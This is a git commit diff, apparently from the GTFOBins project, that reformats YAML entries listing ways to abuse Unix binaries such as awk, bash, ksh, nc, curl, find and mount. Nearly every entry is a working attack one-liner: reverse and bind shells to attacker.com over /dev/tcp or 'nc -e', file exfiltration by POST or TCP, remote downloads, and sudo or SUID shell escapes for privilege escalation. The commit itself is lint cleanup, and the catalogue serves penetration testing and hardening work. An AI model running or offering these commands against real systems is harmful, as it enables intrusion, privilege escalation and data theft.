Fix YAMLs according to YAMLlint

This commit is contained in:
Andrea Cardaci 2018-07-16 15:01:50 +02:00
parent 785126ede0
commit e1cd3aed68
87 changed files with 996 additions and 1061 deletions

3
.yamllint Normal file
View File

@ -0,0 +1,3 @@
extends: default
rules:
line-length: disable

View File

@ -1,4 +1,4 @@
.PHONY: serve serve-public bundle .PHONY: serve serve-public bundle lint
serve: serve:
bundle exec jekyll serve bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
bundle: bundle:
bundle install bundle install
lint:
yamllint . _gtfobins/*.md

View File

@ -1,3 +1,4 @@
---
title: GTFOBins title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']

View File

@ -1,3 +1,4 @@
---
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: | description: |

View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ash - code: ash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./ash" - code: "./ash"
sudo-enabled: sudo-enabled:
- code: sudo ash - code: sudo ash
--- ---

View File

@ -1,34 +1,34 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}' - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT; s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive: bind-shell-non-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
awk -v LPORT=$LPORT 'BEGIN { awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0"; s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" awk '//' "$LFILE"
sudo-enabled: sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited: suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh")}' - code: ./awk 'BEGIN {system("/bin/sh")}'
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
base64 "$LFILE" | base64 --decode base64 "$LFILE" | base64 --decode
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./base64 "$LFILE" | base64 --decode ./base64 "$LFILE" | base64 --decode
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode sudo base64 "$LFILE" | base64 --decode
--- ---

View File

@ -1,55 +1,52 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: bash - code: bash
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_send
export LFILE=file_to_send bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` code: |
on the attacker box to collect the file. export RHOST=attacker.com
code: | export RPORT=12345
export RHOST=attacker.com export LFILE=file_to_send
export RPORT=12345 bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_get
export LFILE=file_to_get bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
bash -c 'echo data > $LFILE' bash -c 'echo data > $LFILE'
file-read: file-read:
- description: It trims trailing newlines and it's not binary-safe. - description: It trims trailing newlines and it's not binary-safe.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
bash -c 'echo "$(<$LFILE)"' bash -c 'echo "$(<$LFILE)"'
suid-enabled: suid-enabled:
- code: "./bash -p" - code: "./bash -p"
sudo-enabled: sudo-enabled:
- code: sudo bash - code: sudo bash
--- ---

View File

@ -1,27 +1,25 @@
--- ---
description: | description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example. what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
- code: busybox sh - code: busybox sh
upload: upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 export LPORT=12345
busybox httpd -f -p $LPORT -h . busybox httpd -f -p $LPORT -h .
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE' busybox sh -c 'echo "data" > $LFILE'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid-enabled:
- description: It may drop the SUID privileges depending on the compilation flags - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
and the runtime configuration. code: "./busybox sh"
code: "./busybox sh"
sudo-enabled: sudo-enabled:
- code: sudo busybox sh - code: sudo busybox sh
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cat "$LFILE" cat "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cat "$LFILE" ./cat "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cat "$LFILE" sudo cat "$LFILE"
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e code: crontab -e
sudo-enabled: sudo-enabled:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e code: sudo crontab -e
--- ---

View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: csh - code: csh
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./csh -b" - code: "./csh -b"
sudo-enabled: sudo-enabled:
- code: sudo csh - code: sudo csh
--- ---

View File

@ -1,21 +1,20 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
the attacker box to collect the file. code: |
code: | URL=http://attacker.com/
URL=http://attacker.com/ LFILE=file_to_send
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
curl -X POST -d @$file_to_send $URL
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=file_to_save LFILE=file_to_save
curl $URL -o $LFILE curl $URL -o $LFILE
file-read: file-read:
- description: The file path must be absolute. - description: The file path must be absolute.
code: | code: |
LFILE=/tmp/file_to_read LFILE=/tmp/file_to_read
curl file://$LFILE curl file://$LFILE
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cut -d "" -f1 "$LFILE" cut -d "" -f1 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cut -d "" -f1 "$LFILE" ./cut -d "" -f1 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE" sudo cut -d "" -f1 "$LFILE"
--- ---

View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: dash - code: dash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./dash -p" - code: ./dash -p
sudo-enabled: sudo-enabled:
- code: sudo dash - code: sudo dash
--- ---

View File

@ -1,11 +1,11 @@
--- ---
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | dd of=$LFILE echo "data" | dd of=$LFILE
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
dd if=LFILE dd if=LFILE
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE diff --line-format=%L /dev/null $LFILE
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE ./diff --line-format=%L /dev/null $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE sudo diff --line-format=%L /dev/null $LFILE
--- ---

View File

@ -1,23 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
ed ed
!/bin/sh !/bin/sh
file-write: file-write:
- code: | - code: |
ed file_to_write ed file_to_write
w w
file-read: file-read:
- code: 'ed file_to_read - code: ed file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ed sudo ed
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./ed ./ed
!/bin/sh !/bin/sh
--- ---

View File

@ -1,17 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")' - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write: file-write:
- code: | - code: |
emacs file_to_write emacs file_to_write
C-x C-s C-x C-s
file-read: file-read:
- code: 'emacs file_to_read - code: emacs file_to_read
'
suid-enabled: suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")' - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid-enabled:
- code: "./env /bin/sh -p" - code: ./env /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: 'The read file content is corrupted by replacing tabs with spaces. description: The read file content is corrupted by replacing tabs with spaces.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
expand "$LFILE" expand "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./expand "$LFILE" ./expand "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo expand "$LFILE" sudo expand "$LFILE"
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid-enabled:
- code: "./expect -c 'spawn /bin/sh -p;interact'" - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid-enabled:
- code: "./find . -exec /bin/sh -p \\; -quit" - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid-enabled:
- code: "./flock -u / /bin/sh -p" - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: 'The read file content is not binary-safe. description: The read file content is not binary-safe.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE" fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE" ./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE" sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fold -w99999999 "$LFILE" fold -w99999999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fold -w99999999 "$LFILE" ./fold -w99999999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fold -w99999999 "$LFILE" sudo fold -w99999999 "$LFILE"
--- ---

View File

@ -1,23 +1,23 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
ftp ftp
!/bin/sh !/bin/sh
upload: upload:
- description: Send local file to a FTP server. - description: Send local file to a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
put file_to_send put file_to_send
download: download:
- description: Fetch a remote file from a FTP server. - description: Fetch a remote file from a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
get file_to_get get file_to_get
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ftp sudo ftp
!/bin/sh !/bin/sh
--- ---

View File

@ -7,11 +7,11 @@ description: |
[version 3](/gtfobins/python3/). [version 3](/gtfobins/python3/).
functions: functions:
execute-interactive: execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit - code: gdb -nx -ex '!sh' -ex quit
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
sudo-enabled: sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit - code: sudo gdb -nx -ex '!sh' -ex quit
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
head -c1G "$LFILE" head -c1G "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./head -c1G "$LFILE" ./head -c1G "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo head -c1G "$LFILE" sudo head -c1G "$LFILE"
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid-enabled:
- code: "./ionice /bin/sh -p" - code: ./ionice /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
jq -Rr . "$LFILE" jq -Rr . "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./jq -Rr . "$LFILE" ./jq -Rr . "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo jq -Rr . "$LFILE" sudo jq -Rr . "$LFILE"
--- ---

View File

@ -1,59 +1,56 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ksh - code: ksh
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_send
export LFILE=file_to_send ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` code: |
on the attacker box to collect the file. export RHOST=attacker.com
code: | export RPORT=12345
export RHOST=attacker.com export LFILE=file_to_send
export RPORT=12345 ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_get
export LFILE=file_to_get ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ksh -c 'echo data > $LFILE' ksh -c 'echo data > $LFILE'
file-read: file-read:
- description: It trims trailing newlines. - description: It trims trailing newlines.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c 'echo "$(<$LFILE)"' ksh -c 'echo "$(<$LFILE)"'
- description: It trims trailing newlines. - description: It trims trailing newlines.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid-enabled:
- code: "./ksh -p" - code: ./ksh -p
sudo-enabled: sudo-enabled:
- code: sudo ksh - code: sudo ksh
--- ---

View File

@ -9,9 +9,9 @@ description: |
``` ```
functions: functions:
execute-interactive: execute-interactive:
- code: "/lib/ld.so /bin/sh" - code: /lib/ld.so /bin/sh
suid-enabled: suid-enabled:
- code: "./ld.so /bin/sh -p" - code: ./ld.so /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---

View File

@ -1,22 +1,20 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
less /etc/profile less /etc/profile
!/bin/sh !/bin/sh
- code: | - code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v v
file-read: file-read:
- code: 'less file_to_read - code: less file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./less /etc/profile ./less /etc/profile
!/bin/sh !/bin/sh
--- ---

View File

@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ltrace -b -L /bin/sh - code: ltrace -b -L /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo ltrace -b -L /bin/sh - code: sudo ltrace -b -L /bin/sh
--- ---

View File

@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
mail -f $TF mail -f $TF
!/bin/sh !/bin/sh
sudo-enabled: sudo-enabled:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
sudo mail -f $TF sudo mail -f $TF
!/bin/sh !/bin/sh
--- ---

View File

@ -1,24 +1,21 @@
--- ---
description: | description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
All these examples only work with GNU `make` due to the lack of support of the
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND" make -s --eval=$'x:\n\t-'"$COMMAND"
file-write: file-write:
- description: Requires a newer GNU `make` version. - description: Requires a newer GNU `make` version.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
make -s --eval="\$(file >$LFILE,data)" . make -s --eval="\$(file >$LFILE,data)" .
suid-enabled: suid-enabled:
- code: | - code: |
COMMAND='/bin/sh -p' COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND" ./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled: sudo-enabled:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND" sudo make -s --eval=$'x:\n\t-'"$COMMAND"
--- ---

View File

@ -1,19 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'man file_to_read - code: man file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo man man sudo man man
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./man man ./man man
!/bin/sh !/bin/sh
--- ---

View File

@ -1,17 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'more file_to_read - code: more file_to_read
'
suid-enabled: suid-enabled:
- code: "./more file_to_read\n" - code: "./more file_to_read\n"
sudo-enabled: sudo-enabled:
- code: | - code: |
TERM= sudo -E more /etc/profile TERM= sudo -E more /etc/profile
!/bin/sh !/bin/sh
--- ---

View File

@ -1,8 +1,8 @@
--- ---
functions: functions:
sudo-enabled: sudo-enabled:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: | code: |
sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount
sudo mount sudo mount
--- ---

View File

@ -1,38 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
nano -s $TF /etc/hosts nano -s $TF /etc/hosts
^T ^T
file-write: file-write:
- code: | - code: |
nano file_to_write nano file_to_write
^O ^O
file-read: file-read:
- code: 'nano file_to_read - code: nano file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./nano -s $TF /etc/hosts ./nano -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo nano -s $TF /etc/hosts sudo nano -s $TF /etc/hosts
^T ^T
--- ---

View File

@ -1,29 +1,27 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
nc -e /bin/sh $RHOST $RPORT nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive: bind-shell-interactive:
